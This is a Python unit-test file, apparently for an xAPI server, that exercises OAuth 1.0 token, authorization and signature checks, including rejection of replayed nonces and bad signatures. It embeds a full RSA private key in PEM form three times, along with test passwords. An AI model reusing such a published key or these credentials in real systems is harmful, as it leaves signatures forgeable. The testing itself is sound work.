def test_request_token_wrong_scope(self):
# passing scope as form param instead of in query string in this instance
form_data = {
'scope':'all',
}
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items()))
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Add signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
#Change form scope from what oauth_request was made with
form_data['scope'] = 'profile'
request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data,
content_type="x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 400)
self.assertEqual(request_resp.content, 'Could not verify OAuth request.')
def test_request_token_same_nonce_and_time(self):
# Nonce/timestamp/token combo should always be unique
# Header params we're passing in
now_time = str(int(time.time()))
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key, now_time)
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
# ========================================
# Try to create another request token with the same nonce
# Header params we're passing in
oauth_header_request_token_params2 = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key, now_time)
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list2 = oauth_header_request_token_params2.split(",")
oauth_header_request_token_params_dict2 = {}
for p in request_token_param_list2:
item = p.split("=")
oauth_header_request_token_params_dict2[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict2['OAuth realm']
# add scope to the existing params
oauth_request2 = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict2)
# create signature and add it to the header params
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, None)
oauth_header_request_token_params2 = oauth_header_request_token_params2 + ",oauth_signature=%s" % signature2
request_resp2 = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params2)
self.assertEqual(request_resp2.status_code, 400)
def test_request_token_no_scope(self):
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# Should still give request_token even w/o scope sent
request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_scope_in_form(self):
# passing scope as form param instead of in query string in this instance
form_data = {
'scope':'all',
'consumer_name':'new_client'
}
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='POST',
http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# By default django's test client POSTs as multipart. We want form
request_resp = self.client.post(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data,
content_type="application/x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_scope_in_qs(self):
# Set scope and consumer_name in param
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_plaintext(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_rsa_sha1(self):
rsa_key = RSA.importKey("""-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----""")
self.consumer.secret = rsa_key.exportKey()
self.consumer.save()
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_rsa_sha1_full_workflow(self):
# Create a user
User.objects.create_user('mike', '[email protected]', 'dino')
self.client.login(username='mike', password='dino')
# Register a consumer with rsa
name = "test mike client"
desc = "test mike client desc"
rsa_key = """-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----"""
form = {"name":name, "description":desc, "rsa": True, "secret":rsa_key}
my_reg_client = self.client.post(reverse(reg_client),form)
self.assertEqual(my_reg_client.status_code, 200)
consumer = Consumer.objects.get(name=name)
self.client.logout()
param = {
'scope':'all',
'consumer_name': name
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/token_ready\"" % (consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
request_token = Token.objects.get(consumer=consumer)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
# Create authorize path, must have oauth_token param
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
# Try to hit auth path, made to login
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='mike', password='dino')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Get the form, set required fields
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Post data back to auth endpoint - should redirect to callback_url we set in oauth headers with request token
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
# Get token again just to make sure
request_token_after_auth = Token.objects.get(consumer=consumer)
self.assertIn(request_token_after_auth.key, auth_post['Location'])
self.assertEqual(request_token_after_auth.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
# Set verifier in access_token params and create new oauth request
oauth_header_access_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (consumer.key, request_token_after_auth.key, str(int(time.time())), "access_nonce", request_token_after_auth.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_token_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, consumer, request_token_after_auth)
oauth_header_access_token_params += ',oauth_signature="%s"' % signature
# Get access token
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=urllib.unquote_plus(access_token_secret), key=access_token_key)
# ============= END ACCESS TOKEN =============
# Set oauth headers user will use when hitting xapi endpoing and access token
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\"" % (consumer.key, access_token.key, str(int(time.time())), "resource_nonce")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
path = TEST_SERVER + "/XAPI/statements"
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
# Create signature and add it to the headers
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_request_token_rsa_sha1_wrong_key(self):
rsa_key = RSA.importKey("""-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----""")
self.consumer.secret = rsa_key.exportKey()
self.consumer.save()
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# create signature and add it to the header params
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % "badsignature"
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 400)
def test_request_token_wrong_oauth_version(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in - wrong oauth_version
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.1\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 400)
def test_request_token_wrong_signature(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.1\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# create signature and add it to the header params - adding wrong signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % "wrongsignature"
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 400)
self.assertEqual(request_resp.content, 'Could not verify OAuth request.')
def test_auth_correct(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# add scope to the existing params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token = Token.objects.get(consumer=self.consumer)
# ===================================================
# Test AUTHORIZE
param = {'oauth_token': token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = token.key
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
access_token = Token.objects.get(consumer=self.consumer)
self.assertIn(access_token.key, auth_post['Location'])
self.assertEqual(access_token.is_approved, True)
def test_auth_scope_up(self):
param = {
'scope':'statements/read',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
